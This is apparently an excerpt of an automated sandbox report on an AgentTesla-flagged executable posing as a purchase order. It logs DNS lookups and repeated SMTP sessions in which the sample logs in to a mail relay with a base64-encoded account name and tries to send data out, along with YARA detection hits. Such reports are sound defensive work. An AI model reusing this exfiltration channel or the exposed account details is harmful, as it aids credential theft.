                                                May 14, 2022 11:38:36.027412891 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.237903118 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.238543987 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.247857094 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.248081923 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.248332024 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.459139109 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.459332943 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.459573984 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.470254898 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.470462084 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.681509018 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.681957006 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.693423033 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.693746090 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.909193039 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.909476995 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.917265892 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.919039965 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:37.132623911 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:37.133021116 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:37.152249098 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:37.152755022 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:37.371928930 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:37.372351885 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:37.374053955 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:37.374274015 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:37.594011068 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:37.594284058 CEST49839587192.168.2.3208.91.198.38

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 14, 2022 11:37:05.487682104 CEST5742153192.168.2.38.8.8.8
                                                May 14, 2022 11:37:05.688388109 CEST53574218.8.8.8192.168.2.3
                                                May 14, 2022 11:37:05.738382101 CEST6535853192.168.2.38.8.8.8
                                                May 14, 2022 11:37:05.757062912 CEST53653588.8.8.8192.168.2.3
                                                May 14, 2022 11:37:14.516261101 CEST5380253192.168.2.38.8.8.8
                                                May 14, 2022 11:37:15.395394087 CEST53538028.8.8.8192.168.2.3
                                                May 14, 2022 11:37:15.838098049 CEST6526653192.168.2.38.8.8.8
                                                May 14, 2022 11:37:15.871031046 CEST53652668.8.8.8192.168.2.3
                                                May 14, 2022 11:38:16.653938055 CEST5242753192.168.2.38.8.8.8
                                                May 14, 2022 11:38:16.672384024 CEST53524278.8.8.8192.168.2.3
                                                May 14, 2022 11:38:16.733551025 CEST6272453192.168.2.38.8.8.8
                                                May 14, 2022 11:38:17.050725937 CEST53627248.8.8.8192.168.2.3
                                                May 14, 2022 11:38:30.725126028 CEST6494153192.168.2.38.8.8.8
                                                May 14, 2022 11:38:30.743849039 CEST53649418.8.8.8192.168.2.3
                                                May 14, 2022 11:38:31.564668894 CEST5540353192.168.2.38.8.8.8
                                                May 14, 2022 11:38:31.583493948 CEST53554038.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.546118975 CEST5496053192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.562371969 CEST53549608.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.564305067 CEST6187753192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.579952955 CEST53618778.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.750690937 CEST6462453192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.769515038 CEST53646248.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.771682024 CEST6441253192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.789570093 CEST53644128.8.8.8192.168.2.3

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                May 14, 2022 11:37:05.487682104 CEST192.168.2.38.8.8.80x8403Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.738382101 CEST192.168.2.38.8.8.80x6b7fStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:14.516261101 CEST192.168.2.38.8.8.80x1f6cStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.838098049 CEST192.168.2.38.8.8.80x4812Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.653938055 CEST192.168.2.38.8.8.80x68c4Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.733551025 CEST192.168.2.38.8.8.80x1399Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.725126028 CEST192.168.2.38.8.8.80x442eStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.564668894 CEST192.168.2.38.8.8.80x8729Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.546118975 CEST192.168.2.38.8.8.80xea2Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.564305067 CEST192.168.2.38.8.8.80xf929Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.750690937 CEST192.168.2.38.8.8.80x114dStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.771682024 CEST192.168.2.38.8.8.80x9bf3Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                May 14, 2022 11:37:10.559385061 CEST58749747208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:37:10.559766054 CEST49747587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:37:10.782027960 CEST58749747208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:10.783271074 CEST49747587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:11.317747116 CEST58749747208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:11.405200958 CEST49747587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:11.628443956 CEST58749747208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:37:11.853620052 CEST58749747208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:11.854393959 CEST49747587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:12.079016924 CEST58749747208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:37:12.079271078 CEST49747587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:37:12.321695089 CEST58749747208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:37:12.857587099 CEST58749747208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:37:40.828701973 CEST58749752162.222.225.16192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:37:40.828891039 CEST49752587192.168.2.3162.222.225.16EHLO 035347
                                                May 14, 2022 11:37:41.049762011 CEST58749752162.222.225.16192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:37:41.049993992 CEST49752587192.168.2.3162.222.225.16AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:37:41.271897078 CEST58749752162.222.225.16192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:37:41.496193886 CEST58749752162.222.225.16192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:41.496411085 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.029009104 CEST58749752162.222.225.16192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:37:42.108721972 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.718844891 CEST49752587192.168.2.3162.222.225.16MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:37:42.941464901 CEST58749752162.222.225.16192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:37:42.941850901 CEST49752587192.168.2.3162.222.225.16RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:37:43.174514055 CEST58749752162.222.225.16192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:17.770459890 CEST58749823208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:17.770930052 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:18.305701971 CEST58749823208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:18.424050093 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:19.221009970 CEST49823587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:19.443476915 CEST58749823208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:19.443802118 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:20.649733067 CEST58749823208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:22.111876011 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:27.252902985 CEST49823587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:27.453726053 CEST58749823208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:27.657000065 CEST58749823208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:27.657284021 CEST49823587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:27.858243942 CEST58749823208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:27.858702898 CEST49823587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:28.080161095 CEST58749823208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:32.531996012 CEST58749837208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:32.535051107 CEST49837587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:32.734733105 CEST58749837208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:32.735054970 CEST49837587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:32.935878038 CEST58749837208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:33.138474941 CEST58749837208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:33.435726881 CEST49837587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:33.637151957 CEST58749837208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:33.637434006 CEST49837587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:33.848023891 CEST58749837208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:36.027163982 CEST58749838208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:36.027412891 CEST49838587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:36.237903118 CEST58749839208.91.198.38192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 14, 2022 11:38:36.238543987 CEST49839587192.168.2.3208.91.198.38EHLO 035347
                                                May 14, 2022 11:38:36.248081923 CEST58749838208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:36.248332024 CEST49838587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:36.459332943 CEST58749839208.91.198.38192.168.2.3250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 14, 2022 11:38:36.459573984 CEST49839587192.168.2.3208.91.198.38AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
                                                May 14, 2022 11:38:36.470254898 CEST58749838208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:36.681509018 CEST58749839208.91.198.38192.168.2.3334 UGFzc3dvcmQ6
                                                May 14, 2022 11:38:36.693423033 CEST58749838208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:36.693746090 CEST49838587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:36.909193039 CEST58749839208.91.198.38192.168.2.3235 2.7.0 Authentication successful
                                                May 14, 2022 11:38:36.909476995 CEST49839587192.168.2.3208.91.198.38MAIL FROM:<aborderias@transmase.com>
                                                May 14, 2022 11:38:36.917265892 CEST58749838208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:36.919039965 CEST49838587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:37.132623911 CEST58749839208.91.198.38192.168.2.3250 2.1.0 Ok
                                                May 14, 2022 11:38:37.133021116 CEST49839587192.168.2.3208.91.198.38RCPT TO:<aborderias@transmase.com>
                                                May 14, 2022 11:38:37.152249098 CEST58749838208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                May 14, 2022 11:38:37.371928930 CEST58749839208.91.198.38192.168.2.3550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:11:36:28
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
                                                Imagebase:0xb30000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:11:36:42
